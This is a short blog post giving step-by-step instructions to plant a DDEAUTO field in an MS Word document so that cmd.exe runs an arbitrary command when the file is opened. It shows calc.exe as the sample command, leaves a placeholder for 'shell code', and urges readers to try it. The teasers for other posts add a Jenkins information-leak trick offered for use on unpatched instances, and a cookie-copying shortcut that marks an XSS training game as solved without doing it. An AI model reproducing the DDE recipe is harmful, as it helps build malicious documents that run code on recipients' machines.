Skip to main content

Execute Shell From MSWord

Step 1.)Open MS-Word as blank document

Step 2.)Click insert->Quick parts->Field

Step 3.)In field  Select = (formula) and click ok

Step 4.)Select the text appeared and toggle its code by right clicking it.

Step 5.)Enter following code in curly braces
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k [Shell code that you want to insert]"


explained:
DDEAUTO-> keyword to inform MSword that this is a DDE field and will auto execute  when the document is opened
command is executed which is in "        "
for example {DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"}

Save it
Run this on your own computer and select "yes" after it will prompt for permissions
Finally it will open up calculator.

TRY IT!!

Comments

Post a Comment

Popular posts from this blog

Want a P5 bug or escalate it to P3 or P4

Hello Everyone, Many months back when i was testing on hackerone and i came across Jenkins instance. So first and foremost i did directory bruteforce and found interesting thing  on Jenkins instance i reported it got closed as informational as it was a VDP (was noob back there) I came across some more programs on jenkins instance and same error also appeared there . So i searched for more instances and it was working on all of then. What was the issue? Let's say target.com is jenkins instance so if we hit http://target.com/assets/ It throws stack error giving us instance information REPORTED I reported this to jenkins https://www.jenkins.io/security/ and after some days i recieved a  mail   I was so glad that i was going to get CVE in my pocket. BUT unfortunately So i guess i wasn't getting any CVE So if anyone want any information about instance or plugins feel free to use above method if not fixed Here's Jira issue https://issues.jenki...
Post a Comment
Read more

Solve http://xss-game.appspot.com/ Without Actually Solving It

First install web extension EditThisCookie from  http://www.editthiscookie.com/ Then open http://r00tz-web-intro.appspot.com/rootz And solve all challenges in it. They are all damn easy. when you have solved all levels in it and paste it's cookies in  http://xss-game.appspot.com/ and refresh the home page. And you will see that you have completed all the levels.
Post a Comment
Read more

Do IDOR( Insecure direct object references ) Exists Everywhere ?

Hello everyone,   As infosec community has given me so much so i also plan to contribute in it Also take it as a tip , i guess you can learn and report something out of it . For those who don't know what IDOR is. Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly .  Explanation of IDOR   Lets's assume a user has a user_id 123 so he access his/her account by visiting this link https://xxxx/profile/123 He change user_id to 456 https://xxxx/profile/456 and he can get details of 456 So that is IDOR in simple terms.     What was the bug exactly So I was hunting on a company website and i subscribed for its alerts. So i reported some bugs that some performed good and some were duplicates. On late evening i got a mail from that company of some errors t...
Post a Comment
Read more